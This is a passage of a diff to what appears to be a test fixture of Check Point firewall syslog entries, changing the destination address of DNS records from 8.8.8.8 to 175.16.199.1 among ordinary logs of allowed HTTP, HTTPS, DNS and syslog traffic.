FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58866"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58868"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45745"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41823"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33585"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26810"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59124"; service:"80"; service_id:"http"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59126"; service:"80"; service_id:"http"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; 
s_port:"59128"; service:"80"; service_id:"http"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x8,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59130"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55776"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55776"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.20.72"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41686"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x9,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37337"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x9,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37337"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45524"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45526"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45528"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.169.64"; log_delay:"1585501103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45530"; service:"443"; 
service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47325"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501103"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47325"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3af,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"108.177.119.154"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60980"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ba,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34118"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:58:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ba,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64726"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] 
@@ -1828,30 +1828,30 @@ <134>1 2020-03-29T16:58:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3bb,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35219"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:59:02Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3d6,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"] <134>1 2020-03-29T16:59:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3d7,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:59:05Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3d9,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501145"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35380"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3da,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501146"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45096"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:05Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3d9,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501145"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35380"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:06Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3da,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501146"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45096"; service:"53"; 